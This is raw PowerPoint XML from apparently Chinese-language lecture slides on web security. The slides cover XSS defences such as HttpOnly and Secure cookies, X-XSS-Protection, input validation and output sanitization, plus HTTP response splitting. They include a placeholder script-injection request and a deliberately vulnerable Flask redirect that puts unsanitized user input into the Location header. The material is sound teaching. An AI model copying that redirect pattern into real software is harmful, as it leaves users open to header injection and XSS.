            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="625404" lvl="1" indent="-371475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/>
              <a:t>限制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>访问：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>HttpOnly and Secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="625404" lvl="1" indent="-371475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/>
              <a:t>客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>过滤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服务端措施</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="625404" lvl="1" indent="-371475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/>
              <a:t>输入检测：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Input Validation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="625404" lvl="1" indent="-371475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/>
              <a:t>输出净化：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Output Sanitization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Elbow Connector 54"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="21" idx="1"/>
            <a:endCxn id="50" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1217875" y="4367065"/>
            <a:ext cx="1022251" cy="1259199"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 37639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1" idx="1"/>
            <a:endCxn id="20" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1" flipV="1">
            <a:off x="2083449" y="3709794"/>
            <a:ext cx="733663" cy="1103133"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -26005"/>
              <a:gd name="adj2" fmla="val 83864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Web架构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85" y="2497216"/>
            <a:ext cx="725925" cy="72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040" y="1873179"/>
            <a:ext cx="4490843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客户端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95" y="1873823"/>
            <a:ext cx="2727246" cy="392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5337" y="1873179"/>
            <a:ext cx="1942505" cy="392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协议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5337" y="3410247"/>
            <a:ext cx="1942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FTP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HTTP 1.0/1.1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HTTP 2.0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SSL and TLS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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Websocket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815" y="3498384"/>
            <a:ext cx="1146929" cy="163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文档建模和渲染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3449" y="3498384"/>
            <a:ext cx="1467326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HTML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解析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37" y="4819893"/>
            <a:ext cx="848200" cy="848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5400000">
            <a:off x="3940330" y="4160392"/>
            <a:ext cx="1840242" cy="3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网络协议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6017175" y="4160392"/>
            <a:ext cx="1840242" cy="3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网络协议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17" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="11" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3550775" y="3709794"/>
            <a:ext cx="115444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3661" y="3395506"/>
            <a:ext cx="72648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HTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Elbow Connector 22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1400721" y="3709794"/>
            <a:ext cx="682728" cy="445861"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3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83449" y="4812927"/>
            <a:ext cx="1467326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CSS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解析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40125" y="4155655"/>
            <a:ext cx="1154441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JS Runtime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394566" y="4356622"/>
            <a:ext cx="1310650" cy="72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6301" y="4056540"/>
            <a:ext cx="43954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50775" y="5047069"/>
            <a:ext cx="115444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76189" y="4739726"/>
            <a:ext cx="55976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CSS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88949" y="3921205"/>
            <a:ext cx="233" cy="2344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1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1383744" y="4615447"/>
            <a:ext cx="699706" cy="40889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</p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1384822" y="4367066"/>
            <a:ext cx="855303" cy="7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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402683" y="5267424"/>
            <a:ext cx="815192" cy="71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>
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>存储</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1463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52" name="Elbow Connector 51"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="14" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2749852" y="3703771"/>
            <a:ext cx="578622" cy="3642576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84358" y="5508527"/>
            <a:ext cx="84670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Cookies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87" y="2367449"/>
            <a:ext cx="816747" cy="816747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7470400" y="3410248"/>
            <a:ext cx="1268432" cy="145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应用程序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(Java, PHP, Python, Node, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0" err="1">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>etc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)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Flowchart: Magnetic Disk 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8922562" y="3011305"/>
            <a:ext cx="870480" cy="768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>
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1463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68" name="Straight Arrow Connector 67"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="66" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7092530" y="4136241"/>
            <a:ext cx="3778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12" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7092530" y="5047070"/>
            <a:ext cx="1842206" cy="196923"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3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6" idx="3"/>
            <a:endCxn id="12" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8738832" y="4136241"/>
            <a:ext cx="620005" cy="68365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6" idx="3"/>
            <a:endCxn id="67" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8738831" y="3779706"/>
            <a:ext cx="618971" cy="356536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658412" y="3917289"/>
            <a:ext cx="4514" cy="2337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064384" y="4578476"/>
            <a:ext cx="233" cy="23445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59097E4-21A2-4FDA-B9C1-59B8E71F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53" y="156095"/>
            <a:ext cx="3125588" cy="167474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/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>是强大的应用平台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/>
              <a:t>广泛的用户群体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CN" altLang="en-US" sz="1600"/>
              <a:t>跨平台特性</a:t>
            </a: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1600"/>
              <a:t>平台发展很快、变化很大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/>
              <a:t>C/S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>B/S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>混合模式：手机应用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600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/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>服务和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>被广泛使用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49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HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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24880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通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>HttpOnly cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>预防</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>被盗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服务器声明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>不应被暴露给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>DOM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/>
              <a:t>可以像普通</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一样被发送</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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/>
              <a:t>Secure Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>只能通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>HTTPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用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/>
              <a:t>Website</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>设计者应当使用这两种保护机制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2F7B3E-47C7-4AE1-A74B-B7FCAA82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4025622"/>
            <a:ext cx="8885583" cy="22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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>过滤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7" y="1967234"/>
            <a:ext cx="4266909" cy="353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HTTP/1.1 200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>… other HTTP headers…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>X-XSS-Protection: 1; mode=block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POST /blah HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>… other HTTP headers…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to=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>dude&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=&lt;script&gt;...&lt;/script&gt;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850656" y="1911660"/>
            <a:ext cx="485605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75" indent="-371475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浏览器禁止在请求中搭载“脚本数据”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285750" indent="-371475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预防</a:t>
            </a:r>
            <a:r>
              <a:rPr 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XSS</a:t>
            </a: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反射攻击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371475" indent="-371475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启发式方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000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marL="371475" indent="-371475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</a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>主流浏览器中都采用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="200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1038" y="3390010"/>
            <a:ext cx="416961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E6424BF-F6FB-4CBE-840B-90C86A1770E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="681037" y="6348730"/>
            <a:ext cx="92249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https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-XSS-Protection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="349528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输入合法性检测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request.args.get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if not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is_valid_base64(x): abort(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>500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目的是检测输入数据的合法性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求中的参数、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>posted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的数据等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>假设所有格式正确的数据都是正常请求</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>格式正确意味着安全？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4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输出净化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&lt;div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"content"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{{sanitize(data)}}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/div&gt;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另外一种方法是输出数据净化</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>删除或转义特殊字符，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> ‘&lt;‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>‘&gt;’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>保证脚本不能被插入到文档中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>主要挑战是如何定义净化策略（覆盖范围、例外情况）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>必须考虑恶意文档插入的情境</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CDATA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>attributes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSS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46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zh-CN" altLang="en-US" sz="3656"/>
              <a:t>数据净化挑战</a:t>
            </a:r>
            <a:endParaRPr sz="3656" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="457" name="Shape 457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&lt;div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id=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"content"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&lt;h1&gt;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User Info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&lt;/h1&gt;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&lt;p&gt;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Hi {{user.name}}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&lt;/p&gt;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&lt;p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id=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"status"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style=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"{{</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1950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user.style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}}"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&gt;&lt;/p&gt;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&lt;/div&gt;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&lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr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$.get(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'/user/status/{{user.id}}'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, </a:t>
            </a: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function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(data) {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    $(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'#status'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).html(</a:t>
            </a:r>
            <a:r>
              <a:rPr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'You are now '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+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sz="195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data.status</a:t>
            </a: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});</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="261184">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="203143" algn="l"/>
                <a:tab pos="406287" algn="l"/>
                <a:tab pos="609429" algn="l"/>
                <a:tab pos="812572" algn="l"/>
                <a:tab pos="1015716" algn="l"/>
                <a:tab pos="1218859" algn="l"/>
                <a:tab pos="1422003" algn="l"/>
                <a:tab pos="1625145" algn="l"/>
                <a:tab pos="1828288" algn="l"/>
                <a:tab pos="2031432" algn="l"/>
                <a:tab pos="2234575" algn="l"/>
                <a:tab pos="2437718" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr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&lt;/script&gt;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446944" y="1413378"/>
            <a:ext cx="2012876" cy="431858"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -68472"/>
              <a:gd name="adj2" fmla="val 1205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净化HTML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5626839" y="1894930"/>
            <a:ext cx="2079107" cy="431858"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -108361"/>
              <a:gd name="adj2" fmla="val 785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净化Attribute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188370" y="2931102"/>
            <a:ext cx="2079107" cy="431858"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -102948"/>
              <a:gd name="adj2" fmla="val 980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净化Script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213524" y="4390760"/>
            <a:ext cx="2107905" cy="601239"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -42787"/>
              <a:gd name="adj2" fmla="val -9392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是否已经净化过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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？</a:t>
            </a:r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8401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响应分片问题</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4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23436" y="2527119"/>
            <a:ext cx="8008041" cy="367937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B022BFF-6E00-4543-A931-0FD60025AF89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4642338" y="846138"/>
            <a:ext cx="4768362" cy="164916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07858" indent="-253929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761787" indent="-253929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15716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269645" indent="-253929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app.route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oldurl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do_redirect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...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request.args.get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'u'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resp.headers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'Location'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注入页面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F8204-BAD3-7A44-A0C7-A5ADCE68E940}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844648" y="6373741"/>
            <a:ext cx="8566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mic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/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95EE1-C691-044E-9FAA-368C1DD2B784}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1787398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>
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>黑客注入Location字段</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Comic Sans MS" panose="030F0902030302020204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5E7506-3B5F-8D46-B804-A629BF1B3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600" y="2327593"/>
            <a:ext cx="4876246" cy="256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1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响应分片示例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679" y="763209"/>
            <a:ext cx="3364024" cy="2163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25" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>app.route</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>oldurl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0" err="1"/>
              <a:t>do_redirect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0"/>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t># ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0" err="1"/>
              <a:t>request.args.get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'u'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>''</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0" err="1"/>
              <a:t>resp.headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'Location'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0"/>
              <a:t>] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1625" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0" err="1"/>
              <a:t>resp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1625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66334" y="2926356"/>
            <a:ext cx="8214498" cy="320333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ular Callout 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7591466" y="3099784"/>
            <a:ext cx="2193237" cy="658431"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33084"/>
              <a:gd name="adj2" fmla="val -1427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用户上传数据未净化!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21689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注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
